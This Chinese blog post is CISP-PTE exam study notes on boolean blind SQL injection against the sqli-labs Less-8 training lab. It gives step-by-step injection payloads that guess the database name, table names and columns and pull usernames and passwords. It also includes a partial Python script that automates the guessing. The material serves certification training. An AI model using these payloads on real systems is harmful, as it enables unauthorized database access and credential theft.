【PTE】SQL注入(二)

最新推荐文章于 2024-02-02 16:48:27 发布
最新推荐文章于 2024-02-02 16:48:27 发布
阅读量809 收藏 1
点赞数
分类专栏: SQL注入 PTE 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HkD01L/article/details/127907121
版权

七、盲注

盲注会用到上百条语句去一个字母一个字母猜,所以一般都会用自动化工具去跑,而不是手工注入

(一)布尔盲注(bool)

特点:无论参数是什么,只有两种:①正常显示,②啥也不显示

1.几个函数

substr()

截取函数,要给3个参数

substr(要截取的字符串,从哪一位开始截取,截取几位)

substr(pte,1,1)就是p

ascii()

将字母转换成ascii码的数字

length()

长度转换函数,输出结果的长度

2.sqlilabs-less8 

只有两种显示:一种正常显示,一种啥也不显示

符合盲注特点,选择盲注方式处理

猜库长度

1. 判断数据库名字的长度

?id=1' and length(database())>5 --+

通过改变数字来确定数据库名字长度,等没有回显时就说明不符合条件,最后再

?id=1' and length(database())=8 --+

有回显,说明数据库长度为8

2.猜解数据库名
这里采用substr函数对数据库名进行分割,配合ascii函数,利用二分法进行字母猜解:
先猜解第一个字母:

?id=1' and ascii(substr(database(),1,1))>100 --+


猜解第二个字母:

?id=1' and ascii(substr(database(),2,1))>100 --+

3.猜解当前库中的表:
先猜解第一个表名的第一个字母:

?id=1’ and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>10 --+

4.猜解users表中的字段:
先猜解第一个字段的第一个字母:

?id=1’ and ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))>100 --+

5.猜解username字段的信息:
先猜解第一个信息的第一个字母:

?id=1’ and ascii(substr((select username from security.users limit 0,1),1,1))>10 --+

6.猜解password字段的信息:
先猜解第一个信息的第一个字母:
 

?id=1’ and ascii(substr((select password from security.users limit 0,1),1,1))>10 --+

7.一遍遍穷举,最后一百多次后得到全部数据

所以这玩意就不能手工注入,就该跑脚本 sqlmap跑这一关就很方便

3.sqlilabs-less8 脚本

抄来一份别的师傅写的针对这一关的脚本

copyright©Less-8(盲注--布尔盲注)_老司机开代码的博客-CSDN博客

#!/usr/bin/env python
# -*- encoding: utf-8 -*-

import requests
import re

class SQL_injection():
    def __init__(self, id, url, table_name='tables', db_name='information.schema',  *args):
        self.id = id
        self.url = url
        self.db_name = db_name
        self.table_name = table_name
        self.args = args

    # 访问操作
    # 判断检索字段返回值: 返回检索字段的数目
    # 盲注返回值: True返回1 False返回0
    def req(self, url, num):
        response = requests.get(url)
        # print(url)
        # print(response.text)
        result = re.search(r'color="#FFFF00">(.*?)<', response.text)
        # print(result)
        if result:
            if result.group(1) == "You are in...........":
                # print("连接正确")
                return num
            else:
                return 0
        else:
            return 0


    # 判断字段数目, 需要指定数据库和数据表
    def column_num(self):
        num = 0
        for i in range(1, 100):
            new_url1 = self.url + self.id + " order by %s --+ " % (i)
            # print(new_url1)
            flag = self.req(new_url1, i)
            if flag:
                num = flag
                print("\r网页搜索的字段数目为:%s" % flag, end="")
            if not flag:
                # print("xxx")
                break
        print()
        return num


    # 判断当前数据库名字
    def db_name1(self):
        length = 0
        for i in range(1,100):
            new_url = self.url + self.id + " and length(database())=%s  --+" % i
            flag = self.req(new_url, 1)
最低0.47元/天 解锁文章
HkD01L
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISP-PTESQL注入次注入的应用)
lza20001103的博客
07-04 2612
CISP-PTESQL注入次注入的应用)
文章管理系统(CMS)
12-11
文章管理系统是对文章进行一系列的管理操作,主要是文章的发布、编写,还有栏目的管理
PTESQL注入(一)
HkD01L的博客
11-10 661
CISP-PTE国家注册信息安全渗透测试工程师课程笔记SQL注入 、联合查询注入、阶注入、报错注入
CISP-PTE考前练习-SQL注入
千寻的博客
10-17 3612
常见的SQL注入的总结
cisp-pte基础题目之SQL注入
weixin_53313406的博客
11-25 2982
cisp-pte基础题目之SQL注入(超详细)
CISP-PTE 练习题目-sql注入1
qq_29576929的博客
08-13 3109
sql注入
CISP-PTE内容丰富.rar
09-04
爆破.docx 命令执行.docx 上传.docx sql注入.docx 文件包含.docx 综合渗透.docx
CISP-PTE模拟练习网站源码.zip
11-22
4. **安全性实践**:作为CISP-PTE的练习,源码可能会体现各种安全措施,如输入验证、XSS防御、CSRF防护、SQL注入预防等。这些实践对于防止黑客攻击和保护用户隐私至关重要。 5. **渗透测试技术**:源码中可能包含了...
CISP-PTE认证资料.zip
最新发布
03-27
cisp-pte靶场通关思路分享----SQL注入篇 cisp-pte靶场通关思路分享----xss篇 cisp-pte靶场通关思路分享----命令执行的另外解题思路 cisp-pte靶场通关思路分享----命令注入篇 cisp-pte靶场通关思路分享----日志分析篇...
cisp-pte注册渗透测试工程师详细资料及视频教程
07-16
考生可以对这些源码进行分析,寻找潜在的安全漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞等,并尝试编写Poc(Proof of Concept)验证漏洞存在。 学习CISP-PTE的过程中,考生需要对网络安全的法律法规有基本...
CISP-PTE注册信息安全专业人员渗透测试工程师-认证课件资料
01-30
CISP-PTE注册信息安全专业人员渗透测试工程师-认证...05.SQL注入之基础篇 07.暴力破解 08.文件上传漏洞 09.命令执行漏洞 10.文件包含漏洞 11.社会工程学 12.ARP欺骗 13.xss跨站脚本漏洞 14.CSRF跨站请求伪造 15.SSRF
渗透测试CISP-PTESQL注入
未知2066的博客
02-02 1427
SQL注入是一种常见的网络攻击技术,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,以获取未经授权的访问或修改数据库的权限。攻击者可以利用SQL注入漏洞执行任意的数据库操作,如查询、修改、删除数据,甚至获取敏感信息。SQL Injection:通过把sql命令插入到web表单递交或输入域或页面请求的查询字符串,达到欺骗服务器执行恶意的sql命令。
cms文件管理系统靶场的手动SQL注入
qq_42589016的博客
06-17 2046
CSM文件管理系统SQL注入
SQL注入漏洞万能密码
wangjingder803的博客
03-14 321
SQL注入漏洞万能密码
【CISP-PTESQL注入练习题
西原一点红的博客
06-26 1464
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了注释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
sql注入之靶场实操
weixin_45711977的博客
06-23 3443
sql注入之靶场实操
大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-25 3515
数据与网络安全作为保障大数据系统正常运行的基石,同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了,于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训,深入分析CMS系统的安全漏洞,探讨防范措施,提供实战经验和攻防能力,有助于加强大数据与网络安全意识。
【无标题】
weixin_51387754的博客
10-17 1116
CISP-PTE专注于培养、考核高级实用型网络安全渗透测试安全人才,是业界首个理论与实践相结合的网络安全专项技能水平注册考试。
CISP-PTE(sql注入篇)
qq_56726035的博客
07-25 720
记录考ptesql注入练习,仅供参考哦
360 cisp-pte sql 环境 下载
08-22
在360 CISP-PTE SQL环境下载方面,可以通过以下步骤完成: 首先,打开360安全卫士软件,确保已经登录账户,并且软件处于最新版本。 其次,在软件的主界面中,可以找到一个名为“工具箱”的选项,点击进入。 在工具箱中,可以看到一个名为“实战实训”的模块,点击进入。 在实战实训模块中,可以选择PTE SQL环境下载。这个PTE SQL环境是为了进行SQL注入实验和训练而准备的,可以提供一个安全的环境供用户实践SQL注入攻击和防御的技术。 点击PTE SQL环境下载后,软件会自动为您下载并安装相关的环境。 安装完成后,您可以在360安全卫士的软件菜单中找到这个PTE SQL环境,并且可以通过它进行实际的SQL注入实验和训练。 总之,通过360 CISP-PTE SQL环境下载,用户可以方便地获取一个安全的环境进行SQL注入实验和训练,以提升自己的技术水平和安全意识。希望以上回答对您有帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值